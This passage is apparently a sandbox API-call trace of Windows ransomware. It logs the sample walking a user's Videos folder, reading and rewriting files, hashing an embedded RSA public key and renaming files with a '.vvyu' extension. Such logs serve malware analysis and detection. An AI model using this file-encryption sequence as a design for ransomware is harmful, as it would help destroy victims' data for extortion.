hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0195.866] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c443e8 | out: hHeap=0x6a0000) returned 1 [0195.866] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0195.866] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0195.867] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0195.867] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0195.867] WriteFile (in: hFile=0x52c, lpBuffer=0x2d4b778*, nNumberOfBytesToWrite=0x139cb, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d4b778*, lpNumberOfBytesWritten=0x30ffb14*=0x139cb, lpOverlapped=0x0) returned 1 [0195.868] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d4b778 | out: hHeap=0x6a0000) returned 1 [0195.868] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x139d0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.869] WriteFile (in: hFile=0x52c, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0195.869] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0195.869] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c700d0 [0195.869] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0195.869] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0195.869] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0195.870] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0195.870] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c700d0 | out: hHeap=0x6a0000) returned 1 [0195.870] WriteFile (in: hFile=0x52c, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0195.870] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0195.870] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0195.870] WriteFile (in: hFile=0x52c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0195.871] CloseHandle (hObject=0x52c) returned 1 [0195.872] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc0) returned 0x2c5b3e8 [0195.872] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8d0) returned 0x2d2cc80 [0195.873] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b3e8 | out: hHeap=0x6a0000) returned 1 [0195.873] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\EXZou4J4nw j\\be8FTJbjiDo10bNZv.mp4" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\svkl6wu5uab usvqva\\exzou4j4nw j\\be8ftjbjido10bnzv.mp4"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\EXZou4J4nw j\\be8FTJbjiDo10bNZv.mp4.vvyu" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\svkl6wu5uab usvqva\\exzou4j4nw j\\be8ftjbjido10bnzv.mp4.vvyu")) returned 1 [0195.875] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2cc80 | out: hHeap=0x6a0000) returned 1 [0195.875] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0195.875] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0195.878] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x762d70 | out: hHeap=0x6a0000) returned 1 [0195.878] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1bd04490, ftCreationTime.dwHighDateTime=0x1d89f7a, ftLastAccessTime.dwLowDateTime=0xa63bd510, ftLastAccessTime.dwHighDateTime=0x1d8a6da, ftLastWriteTime.dwLowDateTime=0xa63bd510, ftLastWriteTime.dwHighDateTime=0x1d8a6da, nFileSizeHigh=0x0, nFileSizeLow=0xcd91, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EFsNJX_Z-O4v4Zp.swf", cAlternateFileName="EFSNJX~1.SWF")) returned 1 [0195.878] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.878] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xd6) returned 0x762d70 [0195.878] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.879] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\EXZou4J4nw j\\EFsNJX_Z-O4v4Zp.swf") returned=".swf" [0195.879] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\EXZou4J4nw j\\EFsNJX_Z-O4v4Zp.swf" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\svkl6wu5uab usvqva\\exzou4j4nw j\\efsnjx_z-o4v4zp.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x52c [0195.879] GetFileSizeEx (in: hFile=0x52c, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=52625) returned 1 [0195.879] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0195.882] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0xcd6b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.882] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0195.883] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0195.884] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0195.884] SetFilePointer (in: hFile=0x52c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0195.884] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0xcd91, lpOverlapped=0x0) returned 1 [0195.885] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.885] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0195.885] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.885] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.885] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea898) returned 1 [0195.886] CryptCreateHash (in: hProv=0x6ea898, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0195.886] CryptHashData (hHash=0x2cbf990, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0195.886] CryptGetHashParam (in: hHash=0x2cbf990, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0195.886] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0195.886] CryptGetHashParam (in: hHash=0x2cbf990, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0195.886] GetLastError () returned 0x0 [0195.886] CryptDestroyHash (hHash=0x2cbf990) returned 1 [0195.886] CryptReleaseContext (hProv=0x6ea898, dwFlags=0x0) returned 1 [0195.887] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0195.887] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0195.887] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0195.887] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0195.887] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0195.887] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0195.887] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0195.887] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xcd90) returned 0x2d4b778 [0195.887] SetFilePointer (in: hFile=0x52c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0195.888] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0195.888] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0195.888] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0195.888] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0195.888] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0195.888] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d42850 [0195.888] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a180 [0195.888] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d42898 [0195.888] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a198 [0195.888] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a1c8 [0195.888] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a228 [0195.888] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a1e0 [0195.888] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0195.888] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0195.888] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3b920 [0195.888] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0195.888] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a1c8 | out: hHeap=0x6a0000) returned 1 [0195.888] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a1e0 | out: hHeap=0x6a0000) returned 1 [0195.889] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a228 | out: hHeap=0x6a0000) returned 1 [0195.889] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0195.889] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0195.889] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a228 [0195.889] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0195.889] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a1e0 [0195.889] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c443e8 [0195.889] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d3a1c8 [0195.889] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37850 [0195.890] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0195.890] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0195.890] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0195.890] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0195.890] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0195.890] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0195.890] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37800 [0195.890] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0195.890] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a1e0 | out: hHeap=0x6a0000) returned 1 [0195.890] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0195.890] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a1c8 | out: hHeap=0x6a0000) returned 1 [0195.890] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c443e8 | out: hHeap=0x6a0000) returned 1 [0195.890] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0195.890] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a228 | out: hHeap=0x6a0000) returned 1 [0195.891] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0195.891] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0195.891] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0195.891] GetCurrentThreadId () returned 0x264 [0195.891] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0195.891] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d46ea0 [0195.891] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84cc0 [0195.892] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea898 [0195.892] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0195.892] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0195.892] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0195.892] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0195.892] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0195.892] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0195.892] GetCurrentThreadId () returned 0x264 [0195.892] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0195.893] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0195.893] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x74ad40 [0195.893] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0195.894] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0195.894] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0195.894] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0195.895] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0195.895] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0195.895] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0195.895] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a60 [0195.895] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0195.895] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0195.895] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0195.895] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a228 [0195.895] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0195.895] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0195.895] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0195.895] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0195.895] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0195.895] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0195.895] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0195.895] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0195.895] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a1c8 [0195.896] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0195.896] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0195.896] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0195.896] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0195.896] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0195.896] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0195.896] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0195.896] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a1e0 [0195.896] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0195.896] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c443e8 [0195.896] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0195.896] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a1b0 [0195.896] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0195.896] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a240 [0195.896] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0195.896] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0195.896] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0195.896] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a210 [0195.896] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0195.896] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a1f8 [0195.896] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0195.896] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a258 [0195.896] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a1f8 | out: hHeap=0x6a0000) returned 1 [0195.896] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a1f8 [0195.897] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a210 | out: hHeap=0x6a0000) returned 1 [0195.897] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0195.897] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0195.897] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0195.897] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0195.897] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0195.897] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a1c8 | out: hHeap=0x6a0000) returned 1 [0195.897] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a1c8 [0195.897] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0195.897] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2ccdff0 [0195.897] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a228 | out: hHeap=0x6a0000) returned 1 [0195.897] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0195.897] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a258 | out: hHeap=0x6a0000) returned 1 [0195.897] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d3b678 [0195.897] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0195.897] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c0ec50 [0195.897] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0195.897] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0195.897] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a1c8 | out: hHeap=0x6a0000) returned 1 [0195.897] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fc90 [0195.898] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0195.898] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c0d0a0 [0195.898] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0195.899] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea898 | out: hHeap=0x6a0000) returned 1 [0195.899] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: 